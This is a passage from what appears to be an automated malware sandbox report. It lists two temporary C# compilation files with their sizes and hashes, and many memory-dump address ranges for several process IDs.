                                                                                    ec7e1ba41f121a18d0d6eeba23cd9a036ae390bf

                                                                                    SHA256

                                                                                    ce1b4198aa83a3bc2615a39e3de9f400c97dbfbff8eedc07493a592025f966e4

                                                                                    SHA512

                                                                                    1d5e9d484e1e3439219d7e40519860b25b1111ea8a5419b38a92372b574db5765490516d81e22f95ed3e85d5c868f05f87dd10023bd00caf0d6862f7c9198de4

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\grsjam1a\grsjam1a.0.cs

                                                                                    Filesize

                                                                                    1004B

                                                                                    MD5

                                                                                    c76055a0388b713a1eabe16130684dc3

                                                                                    SHA1

                                                                                    ee11e84cf41d8a43340f7102e17660072906c402

                                                                                    SHA256

                                                                                    8a3cd008e86a3d835f55f8415f5fd264c6dacdf0b7286e6854ea3f5a363390e7

                                                                                    SHA512

                                                                                    22d2804491d90b03bb4b640cb5e2a37d57766c6d82caf993770dcf2cf97d0f07493c870761f3ecea15531bd434b780e13ae065a1606681b32a77dbf6906fb4e2

                                                                                  • \??\c:\Users\Admin\AppData\Local\Temp\grsjam1a\grsjam1a.cmdline

                                                                                    Filesize

                                                                                    607B

                                                                                    MD5

                                                                                    2eea63e6702863159285ddfe93730460

                                                                                    SHA1

                                                                                    a09e8e38e2794b55e5b13608a537d408f9110a68

                                                                                    SHA256

                                                                                    683f2b945a8f68b283d7de1e903be6f3912db8af9a8c703f11d4afb810a3f621

                                                                                    SHA512

                                                                                    785fec2101e9bc5ae5d0b6a140742c1ff345a934842643c758a8562c2ba7e24df77bcdfc0d39a483c1e16003b5e7f44576e58175f3096b82a4d47e54e09a620c

                                                                                  • memory/1956-83-0x0000025069890000-0x00000250698B2000-memory.dmp

                                                                                    Filesize

                                                                                    136KB

                                                                                  • memory/2252-205-0x000001FC5AFC0000-0x000001FC5AFC8000-memory.dmp

                                                                                    Filesize

                                                                                    32KB

                                                                                  • memory/4100-283-0x00007FFA24740000-0x00007FFA24AB5000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4100-54-0x00007FFA37FC0000-0x00007FFA37FEC000-memory.dmp

                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/4100-120-0x00007FFA331A0000-0x00007FFA3331D000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/4100-107-0x00007FFA34A00000-0x00007FFA34A1F000-memory.dmp

                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/4100-81-0x00007FFA38C90000-0x00007FFA38CA8000-memory.dmp

                                                                                    Filesize

                                                                                    96KB

                                                                                  • memory/4100-79-0x00007FFA37FC0000-0x00007FFA37FEC000-memory.dmp

                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/4100-82-0x00007FFA24030000-0x00007FFA24148000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4100-70-0x00007FFA24AC0000-0x00007FFA24F26000-memory.dmp

                                                                                    Filesize

                                                                                    4.4MB

                                                                                  • memory/4100-78-0x00007FFA33120000-0x00007FFA3312D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4100-71-0x00007FFA2D8C0000-0x00007FFA2D978000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4100-73-0x0000026C84680000-0x0000026C849F5000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4100-266-0x00007FFA33A90000-0x00007FFA33ABE000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4100-74-0x00007FFA386D0000-0x00007FFA386F4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/4100-72-0x00007FFA24740000-0x00007FFA24AB5000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4100-66-0x00007FFA33A90000-0x00007FFA33ABE000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4100-64-0x00007FFA37F10000-0x00007FFA37F1D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4100-62-0x00007FFA33CB0000-0x00007FFA33CC9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4100-60-0x00007FFA331A0000-0x00007FFA3331D000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/4100-58-0x00007FFA34A00000-0x00007FFA34A1F000-memory.dmp

                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/4100-278-0x00007FFA2D8C0000-0x00007FFA2D978000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4100-77-0x00007FFA33130000-0x00007FFA33145000-memory.dmp

                                                                                    Filesize

                                                                                    84KB

                                                                                  • memory/4100-284-0x0000026C84680000-0x0000026C849F5000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4100-56-0x00007FFA38C90000-0x00007FFA38CA8000-memory.dmp

                                                                                    Filesize

                                                                                    96KB

                                                                                  • memory/4100-186-0x00007FFA33CB0000-0x00007FFA33CC9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4100-48-0x00007FFA39420000-0x00007FFA3942F000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/4100-30-0x00007FFA386D0000-0x00007FFA386F4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/4100-25-0x00007FFA24AC0000-0x00007FFA24F26000-memory.dmp

                                                                                    Filesize

                                                                                    4.4MB

                                                                                  • memory/4100-312-0x00007FFA331A0000-0x00007FFA3331D000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB

                                                                                  • memory/4100-311-0x00007FFA34A00000-0x00007FFA34A1F000-memory.dmp

                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/4100-307-0x00007FFA386D0000-0x00007FFA386F4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/4100-306-0x00007FFA24AC0000-0x00007FFA24F26000-memory.dmp

                                                                                    Filesize

                                                                                    4.4MB

                                                                                  • memory/4100-320-0x00007FFA24030000-0x00007FFA24148000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4100-337-0x00007FFA386D0000-0x00007FFA386F4000-memory.dmp

                                                                                    Filesize

                                                                                    144KB

                                                                                  • memory/4100-342-0x00007FFA2D8C0000-0x00007FFA2D978000-memory.dmp

                                                                                    Filesize

                                                                                    736KB

                                                                                  • memory/4100-341-0x00007FFA34A00000-0x00007FFA34A1F000-memory.dmp

                                                                                    Filesize

                                                                                    124KB

                                                                                  • memory/4100-340-0x00007FFA38C90000-0x00007FFA38CA8000-memory.dmp

                                                                                    Filesize

                                                                                    96KB

                                                                                  • memory/4100-339-0x00007FFA37FC0000-0x00007FFA37FEC000-memory.dmp

                                                                                    Filesize

                                                                                    176KB

                                                                                  • memory/4100-338-0x00007FFA39420000-0x00007FFA3942F000-memory.dmp

                                                                                    Filesize

                                                                                    60KB

                                                                                  • memory/4100-336-0x00007FFA24AC0000-0x00007FFA24F26000-memory.dmp

                                                                                    Filesize

                                                                                    4.4MB

                                                                                  • memory/4100-335-0x00007FFA24030000-0x00007FFA24148000-memory.dmp

                                                                                    Filesize

                                                                                    1.1MB

                                                                                  • memory/4100-334-0x00007FFA33120000-0x00007FFA3312D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4100-333-0x00007FFA33130000-0x00007FFA33145000-memory.dmp

                                                                                    Filesize

                                                                                    84KB

                                                                                  • memory/4100-332-0x00007FFA24740000-0x00007FFA24AB5000-memory.dmp

                                                                                    Filesize

                                                                                    3.5MB

                                                                                  • memory/4100-330-0x00007FFA33A90000-0x00007FFA33ABE000-memory.dmp

                                                                                    Filesize

                                                                                    184KB

                                                                                  • memory/4100-329-0x00007FFA37F10000-0x00007FFA37F1D000-memory.dmp

                                                                                    Filesize

                                                                                    52KB

                                                                                  • memory/4100-328-0x00007FFA33CB0000-0x00007FFA33CC9000-memory.dmp

                                                                                    Filesize

                                                                                    100KB

                                                                                  • memory/4100-327-0x00007FFA331A0000-0x00007FFA3331D000-memory.dmp

                                                                                    Filesize

                                                                                    1.5MB